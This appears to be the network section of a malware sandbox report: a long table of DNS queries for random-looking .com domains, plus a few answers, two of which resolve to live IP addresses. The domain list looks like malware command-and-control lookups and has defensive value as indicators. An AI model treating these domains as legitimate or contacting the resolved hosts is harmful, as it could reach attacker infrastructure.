                                                                                                                                                                                                            Sep 8, 2024 09:00:33.660661936 CEST192.168.2.41.1.1.10x6273Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.661938906 CEST192.168.2.41.1.1.10x2a7dStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.662643909 CEST192.168.2.41.1.1.10xdbe3Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.663322926 CEST192.168.2.41.1.1.10x7505Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.663394928 CEST192.168.2.41.1.1.10x4574Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.664316893 CEST192.168.2.41.1.1.10x7baaStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.667604923 CEST192.168.2.41.1.1.10xa4a7Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.672863007 CEST192.168.2.41.1.1.10x2c0bStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676167965 CEST192.168.2.41.1.1.10xad84Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676359892 CEST192.168.2.41.1.1.10x3171Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676527977 CEST192.168.2.41.1.1.10x6e1aStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676697016 CEST192.168.2.41.1.1.10xde42Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676851988 CEST192.168.2.41.1.1.10xeb3dStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.677021027 CEST192.168.2.41.1.1.10xbd77Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.677179098 CEST192.168.2.41.1.1.10xe1f3Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.680629015 CEST192.168.2.41.1.1.10x9018Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685269117 CEST192.168.2.41.1.1.10x45d4Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685430050 CEST192.168.2.41.1.1.10xed90Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685914993 CEST192.168.2.41.1.1.10x5d2Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686244011 CEST192.168.2.41.1.1.10x49e2Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686629057 CEST192.168.2.41.1.1.10x211bStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686805010 CEST192.168.2.41.1.1.10xe082Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687222004 CEST192.168.2.41.1.1.10xc724Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703248978 CEST192.168.2.41.1.1.10xab0cStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703458071 CEST192.168.2.41.1.1.10x4a2dStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703620911 CEST192.168.2.41.1.1.10x39bcStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703789949 CEST192.168.2.41.1.1.10x43dfStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703967094 CEST192.168.2.41.1.1.10xfba6Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.716984987 CEST192.168.2.41.1.1.10x5a25Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.747122049 CEST192.168.2.41.1.1.10xead9Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.749471903 CEST192.168.2.41.1.1.10x9556Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.751143932 CEST192.168.2.41.1.1.10xa841Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.751606941 CEST192.168.2.41.1.1.10xa9f8Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.753350019 CEST192.168.2.41.1.1.10x5f07Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.754793882 CEST192.168.2.41.1.1.10xf44cStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.755187035 CEST192.168.2.41.1.1.10x992cStandard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.758148909 CEST192.168.2.41.1.1.10xae8cStandard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.758996964 CEST192.168.2.41.1.1.10x1acdStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764748096 CEST192.168.2.41.1.1.10x2ac5Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764844894 CEST192.168.2.41.1.1.10xb166Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764996052 CEST192.168.2.41.1.1.10xdbf9Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.774935007 CEST192.168.2.41.1.1.10xbfadStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775309086 CEST192.168.2.41.1.1.10xd60dStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775564909 CEST192.168.2.41.1.1.10x77cbStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775923967 CEST192.168.2.41.1.1.10x7d81Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.776046991 CEST192.168.2.41.1.1.10xd2eStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.777234077 CEST192.168.2.41.1.1.10xb0c0Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.778081894 CEST192.168.2.41.1.1.10x7aa3Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.780553102 CEST192.168.2.41.1.1.10x8514Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.780920029 CEST192.168.2.41.1.1.10x523eStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.781799078 CEST192.168.2.41.1.1.10x758dStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.781912088 CEST192.168.2.41.1.1.10xf036Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782001019 CEST192.168.2.41.1.1.10xf6c6Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782224894 CEST192.168.2.41.1.1.10xa6b4Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782445908 CEST192.168.2.41.1.1.10xd44eStandard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782639027 CEST192.168.2.41.1.1.10x452dStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782788038 CEST192.168.2.41.1.1.10xdfc4Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783044100 CEST192.168.2.41.1.1.10x2f01Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783741951 CEST192.168.2.41.1.1.10x895Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783866882 CEST192.168.2.41.1.1.10xa069Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.850297928 CEST192.168.2.41.1.1.10x47Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.925986052 CEST192.168.2.41.1.1.10x4e9cStandard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.055741072 CEST192.168.2.41.1.1.10x3c1fStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.340116024 CEST192.168.2.41.1.1.10xfde6Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.343415022 CEST192.168.2.41.1.1.10xd090Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.345369101 CEST192.168.2.41.1.1.10x8addStandard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.352705002 CEST192.168.2.41.1.1.10x9161Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.355045080 CEST192.168.2.41.1.1.10x4196Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.358443022 CEST192.168.2.41.1.1.10x19b1Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.361721992 CEST192.168.2.41.1.1.10x5238Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.362463951 CEST192.168.2.41.1.1.10x693eStandard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.365430117 CEST192.168.2.41.1.1.10x7b29Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.368081093 CEST192.168.2.41.1.1.10x3acbStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.372829914 CEST192.168.2.41.1.1.10xa380Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.379308939 CEST192.168.2.41.1.1.10xb470Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.379612923 CEST192.168.2.41.1.1.10xca60Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.388015985 CEST192.168.2.41.1.1.10x8064Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.389820099 CEST192.168.2.41.1.1.10x645eStandard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.402410984 CEST192.168.2.41.1.1.10x7e15Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.406954050 CEST192.168.2.41.1.1.10xfc04Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.407145023 CEST192.168.2.41.1.1.10x68d7Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.407919884 CEST192.168.2.41.1.1.10x5897Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.408319950 CEST192.168.2.41.1.1.10x3476Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.415257931 CEST192.168.2.41.1.1.10xd4c2Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.415596008 CEST192.168.2.41.1.1.10x29fcStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.415839911 CEST192.168.2.41.1.1.10x53abStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.417398930 CEST192.168.2.41.1.1.10x562cStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.418217897 CEST192.168.2.41.1.1.10x1b4cStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.421283007 CEST192.168.2.41.1.1.10x4d12Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.421617985 CEST192.168.2.41.1.1.10x7f84Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.422935963 CEST192.168.2.41.1.1.10x6638Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.436714888 CEST192.168.2.41.1.1.10x6ae9Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.445797920 CEST192.168.2.41.1.1.10xe23fStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.445995092 CEST192.168.2.41.1.1.10xdb53Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.446227074 CEST192.168.2.41.1.1.10xf17dStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.446485996 CEST192.168.2.41.1.1.10xb54aStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.449887037 CEST192.168.2.41.1.1.10xee44Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.452641964 CEST192.168.2.41.1.1.10x4014Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455097914 CEST192.168.2.41.1.1.10xfa06Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455338001 CEST192.168.2.41.1.1.10x7966Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455362082 CEST192.168.2.41.1.1.10xafa7Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455652952 CEST192.168.2.41.1.1.10x20a0Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455960989 CEST192.168.2.41.1.1.10x322aStandard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.459557056 CEST192.168.2.41.1.1.10xa207Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.460017920 CEST192.168.2.41.1.1.10x163fStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.460264921 CEST192.168.2.41.1.1.10x3549Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.461154938 CEST192.168.2.41.1.1.10x3aa6Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464485884 CEST192.168.2.41.1.1.10xa08fStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464761019 CEST192.168.2.41.1.1.10x62c3Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464854002 CEST192.168.2.41.1.1.10xc68cStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465017080 CEST192.168.2.41.1.1.10x1f2eStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465145111 CEST192.168.2.41.1.1.10x53f1Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.468341112 CEST192.168.2.41.1.1.10x8606Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.468801975 CEST192.168.2.41.1.1.10xc90cStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.469007969 CEST192.168.2.41.1.1.10x20aaStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.474256039 CEST192.168.2.41.1.1.10xc5fdStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.475158930 CEST192.168.2.41.1.1.10x2276Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.476394892 CEST192.168.2.41.1.1.10x2cb4Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.476552963 CEST192.168.2.41.1.1.10xb967Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487004995 CEST192.168.2.41.1.1.10x49b2Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487041950 CEST192.168.2.41.1.1.10x6925Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487288952 CEST192.168.2.41.1.1.10xd798Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487389088 CEST192.168.2.41.1.1.10xa938Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.487524986 CEST192.168.2.41.1.1.10xee60Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.488358974 CEST192.168.2.41.1.1.10x73a1Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.488470078 CEST192.168.2.41.1.1.10x3a87Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.532610893 CEST192.168.2.41.1.1.10x8a1bStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.838671923 CEST192.168.2.41.1.1.10xc44bStandard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.842170954 CEST192.168.2.41.1.1.10x7bb5Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.846231937 CEST192.168.2.41.1.1.10x3a93Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.851015091 CEST192.168.2.41.1.1.10xce3eStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.862387896 CEST192.168.2.41.1.1.10xbdc0Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.883356094 CEST192.168.2.41.1.1.10xac16Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.884131908 CEST192.168.2.41.1.1.10x5ad1Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.900595903 CEST192.168.2.41.1.1.10x6564Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.904134035 CEST192.168.2.41.1.1.10x852aStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.930319071 CEST192.168.2.41.1.1.10x22f3Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.930931091 CEST192.168.2.41.1.1.10xd4f0Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.933984995 CEST192.168.2.41.1.1.10xcb15Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934312105 CEST192.168.2.41.1.1.10xe8b6Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934395075 CEST192.168.2.41.1.1.10x16a6Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934700966 CEST192.168.2.41.1.1.10x396dStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.936332941 CEST192.168.2.41.1.1.10x105cStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.937684059 CEST192.168.2.41.1.1.10xb4e2Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.940045118 CEST192.168.2.41.1.1.10x18c8Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.941981077 CEST192.168.2.41.1.1.10xcf0aStandard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.942336082 CEST192.168.2.41.1.1.10x9b53Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.943952084 CEST192.168.2.41.1.1.10xb363Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946002007 CEST192.168.2.41.1.1.10xe9e2Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.958868027 CEST192.168.2.41.1.1.10x9340Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.960967064 CEST192.168.2.41.1.1.10x88eStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961483955 CEST192.168.2.41.1.1.10x8457Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961528063 CEST192.168.2.41.1.1.10x8c29Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961740017 CEST192.168.2.41.1.1.10xa8f7Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.963972092 CEST192.168.2.41.1.1.10xc4deStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.965818882 CEST192.168.2.41.1.1.10x5f35Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966006994 CEST192.168.2.41.1.1.10xde7Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966203928 CEST192.168.2.41.1.1.10x38cfStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966407061 CEST192.168.2.41.1.1.10xcaaaStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966619015 CEST192.168.2.41.1.1.10x31a3Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966708899 CEST192.168.2.41.1.1.10x6479Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967119932 CEST192.168.2.41.1.1.10x774eStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967308998 CEST192.168.2.41.1.1.10x777fStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967487097 CEST192.168.2.41.1.1.10x7161Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967730999 CEST192.168.2.41.1.1.10xeab7Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.968014002 CEST192.168.2.41.1.1.10xeb77Standard query (0)ganyhus.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.015980959 CEST1.1.1.1192.168.2.40x5778Name error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.018695116 CEST1.1.1.1192.168.2.40x3641Name error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.024175882 CEST1.1.1.1192.168.2.40xe547No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.024175882 CEST1.1.1.1192.168.2.40xe547No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.026000023 CEST1.1.1.1192.168.2.40xbb8fName error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.066605091 CEST1.1.1.1192.168.2.40x7e00Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.066627026 CEST1.1.1.1192.168.2.40xd312No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072314978 CEST1.1.1.1192.168.2.40xee15Name error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072325945 CEST1.1.1.1192.168.2.40xaabaName error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072344065 CEST1.1.1.1192.168.2.40xa4dcName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072352886 CEST1.1.1.1192.168.2.40xdf2dName error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072364092 CEST1.1.1.1192.168.2.40x7fddName error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.072372913 CEST1.1.1.1192.168.2.40x6faName error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
